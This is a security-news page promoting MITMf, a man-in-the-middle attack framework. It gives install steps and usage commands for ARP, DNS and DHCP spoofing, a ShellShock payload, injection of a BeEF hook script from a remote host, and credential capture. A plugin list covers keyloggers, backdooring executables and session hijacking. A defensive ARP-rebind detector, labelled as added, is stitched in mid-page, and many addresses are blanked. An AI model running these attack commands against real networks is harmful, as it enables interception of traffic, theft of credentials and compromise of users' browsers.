Man In The Middle Attack Framework: MITMf

ID N0WHERE:22399
Type n0where
Reporter N0where
Modified 2015-08-30T18:45:33


Man In The Middle Attack Framework

MITMf aims to provide a one-stop-shop for Man-In-The-Middle and network attacks while updating and improving existing attacks and techniques. Originally built to address the significant shortcomings of other tools (e.g. Ettercap, Mallory), it has been almost completely rewritten from scratch to provide a modular and easily extensible framework that anyone can use to implement their own MITM attack.

MITMf v0.9.8 has been released



  • The framework contains a built-in SMB, HTTP and DNS server that can be controlled and used by the various plugins. It also contains a modified version of the SSLStrip proxy that allows for HTTP modification and a partial HSTS bypass.
  • As of version 0.9.8, MITMf supports active packet filtering and manipulation (basically what etterfilters did, only better), allowing users to modify any type of traffic or protocol.
  • The configuration file can be edited on-the-fly while MITMf is running, and the changes will be passed down through the framework; this allows you to tweak settings of plugins and servers while performing an attack.
  • MITMf will capture FTP, IRC, POP, IMAP, Telnet, SMTP, SNMP (community strings), NTLMv1/v2 (all supported protocols like HTTP, SMB, LDAP etc.) and Kerberos credentials by using Net-Creds, which is run on startup.
  • Responder integration allows for LLMNR, NBT-NS and MDNS poisoning and WPAD rogue server support.

Active packet filtering/modification

You can now modify any packet/protocol that gets intercepted by MITMf using Scapy! (no more etterfilters! yay!). For example, here’s a stupid little filter that just changes the destination IP address of ICMP packets:

    if packet.haslayer(ICMP):
        log.info('Got an ICMP packet!')
        # The new destination address is blank in this copy of the page
        packet.dst = ''

  • Use the packet variable to access the packet in a Scapy compatible format
  • Use the data variable to access the raw packet data

Now to use the filter all we need to do is: python -F ~/

You will probably want to combine that with the Spoof plugin to actually intercept packets from someone else 😉 Note that you can modify filters on-the-fly without restarting MITMf!


MITMf relies on a LOT of external libraries, so it is highly recommended that you use virtualenvs to install the framework. This avoids permission issues and conflicts with your system site packages (especially on Kali Linux).

Before starting the installation process:

  • On Arch Linux:

    pacman -S python2-setuptools libnetfilter_queue libpcap libjpeg-turbo

  • On Debian and derivatives (e.g. Ubuntu, Kali Linux etc.):

    apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev

Installing MITMf

Note: if you’re rocking Arch Linux: you’re awesome! Just remember to use pip2 instead of pip outside of the virtualenv

  • Install virtualenvwrapper:

    pip install virtualenvwrapper

  • Edit your .bashrc or .zshrc file to source the script:

    source /usr/bin/

The location of this script may vary depending on your Linux distro

  • Restart your terminal or run:

    source /usr/bin/

  • Create your virtualenv:

    mkvirtualenv MITMf -p /usr/bin/python2.7

  • Clone the MITMf repository:

    git clone

  • cd into the directory, then initialize and clone the repo's submodules:

    cd MITMf && git submodule init && git submodule update --recursive

  • Install the dependencies:

    pip install -r requirements.txt

  • You’re ready to rock!

    python --help


The most basic usage starts the HTTP proxy, the SMB, DNS and HTTP servers, and Net-Creds on interface enp3s0:

python -i enp3s0

ARP poison the whole subnet with the gateway at using the Spoof plugin:

python -i enp3s0 --spoof --arp --gateway

Same as above + a WPAD rogue proxy server using the Responder plugin:

python -i enp3s0 --spoof --arp --gateway --responder --wpad

ARP poison and with the gateway at

python -i enp3s0 --spoof --arp --target, --gateway

Enable DNS spoofing while ARP poisoning (Domains to spoof are pulled from the config file):

python -i enp3s0 --spoof --dns --arp --target --gateway

Enable LLMNR/NBTNS/MDNS spoofing:

python -i enp3s0 --responder --wredir --nbtns

Enable DHCP spoofing (the ip pool and subnet are pulled from the config file):

python -i enp3s0 --spoof --dhcp

Same as above with a ShellShock payload that will be executed if any client is vulnerable:

python -i enp3s0 --spoof --dhcp --shellshock 'echo 0wn3d'

Inject an HTML IFrame using the Inject plugin:

python -i enp3s0 --inject --html-url

Inject a JS script:

python -i enp3s0 --inject --js-url http://beef:3000/hook.js

And much much more!

Of course you can mix and match almost any plugin together (e.g. ARP spoof + inject + Responder etc.)

For a complete list of available options, just run python --help
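From the defender's side, the ARP poisoning performed by the Spoof plugin is visible on the wire as an IP address (usually the gateway's) suddenly being claimed by a different MAC address. The following added example, which is not part of MITMf or the original page, parses raw Ethernet/ARP frames with the Python standard library and flags such rebinds. The function names, addresses and sample frames are constructed for illustration, and the first MAC seen for an IP is assumed to be the legitimate one.

```python
import socket
import struct

def parse_arp(frame):
    """Return (opcode, sender_mac, sender_ip) for an Ethernet/IPv4 ARP frame, else None."""
    if len(frame) < 42 or frame[12:14] != b"\x08\x06":      # EtherType 0x0806 = ARP
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):    # Ethernet + IPv4 only
        return None
    mac = ":".join(f"{b:02x}" for b in frame[22:28])
    return op, mac, socket.inet_ntoa(frame[28:32])

def detect_rebinds(frames, gateway_ip):
    """Alert once per (ip, mac) when an IP is claimed by a MAC other than the first seen."""
    first_seen = {}     # ip -> MAC learned first (assumed legitimate)
    reported = set()    # (ip, mac) pairs already alerted on
    alerts = []
    for index, frame in enumerate(frames):
        parsed = parse_arp(frame)
        if parsed is None:
            continue
        _, mac, ip = parsed
        if ip == "0.0.0.0":             # ARP probe: no binding is being claimed
            continue
        trusted = first_seen.setdefault(ip, mac)
        if mac != trusted and (ip, mac) not in reported:
            reported.add((ip, mac))
            alerts.append({"frame": index, "ip": ip, "expected": trusted, "seen": mac,
                           "severity": "high" if ip == gateway_ip else "medium"})
    return alerts

def _arp(op, smac, sip, tmac, tip):
    """Build one constructed Ethernet/ARP frame (op 1 = request, 2 = reply)."""
    to_bytes = lambda mac: bytes.fromhex(mac.replace(":", ""))
    dst = b"\xff" * 6 if op == 1 else to_bytes(tmac)
    header = dst + to_bytes(smac) + b"\x08\x06" + struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)
    return header + to_bytes(smac) + socket.inet_aton(sip) + to_bytes(tmac) + socket.inet_aton(tip)

# Constructed sample capture: documentation addresses, locally administered MACs.
GW, HOST, ROGUE = "02:00:00:00:00:01", "02:00:00:00:00:0a", "02:00:00:00:00:66"
SAMPLE = [
    _arp(2, GW, "192.0.2.1", HOST, "192.0.2.10"),                   # genuine gateway reply
    _arp(1, HOST, "192.0.2.10", "00:00:00:00:00:00", "192.0.2.1"),  # genuine host request
    _arp(2, ROGUE, "192.0.2.1", HOST, "192.0.2.10"),                # gateway IP, new MAC
    _arp(2, ROGUE, "192.0.2.10", GW, "192.0.2.1"),                  # host IP, new MAC
    _arp(2, ROGUE, "192.0.2.1", HOST, "192.0.2.10"),                # repeat, not re-alerted
]

if __name__ == "__main__":
    print(*detect_rebinds(SAMPLE, "192.0.2.1"), sep="\n")
```

Because trust is first-seen, a legitimate DHCP lease change or NIC replacement also raises an alert, so the learned table should be seeded from a known-good inventory or static gateway entry where possible.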

Man In The Middle Attack Framework: MITMf documentation

Currently available plugins

  • HTA Drive-By

Injects a fake update notification and prompts clients to download an HTA application

  • SMBTrap

Exploits the ‘SMB Trap’ vulnerability on connected clients

  • ScreenShotter

Uses HTML5 Canvas to render an accurate screenshot of a client's browser

  • Responder

LLMNR, NBT-NS, WPAD and MDNS poisoner

  • SSLstrip+

Partially bypass HSTS

  • Spoof

Redirect traffic using ARP, ICMP, DHCP or DNS spoofing

  • BeEFAutorun

Autoruns BeEF modules based on a client’s OS or browser type

  • AppCachePoison

Performs HTML5 App-Cache poisoning attacks

  • Ferret-NG

Transparently hijacks client sessions

  • BrowserProfiler

Attempts to enumerate all browser plugins of connected clients

  • FilePwn

Backdoor executables sent over HTTP using the Backdoor Factory and BDFProxy

  • Inject

Inject arbitrary content into HTML content

  • BrowserSniper

Performs drive-by attacks on clients with out-of-date browser plugins

  • JSkeylogger

Injects a JavaScript keylogger into a client’s webpages

  • Replace

Replace arbitrary content in HTML content

  • SMBAuth

Evoke SMB challenge-response authentication attempts

  • Upsidedownternet

Flips images 180 degrees

Man In The Middle Attack Framework: MITMf Download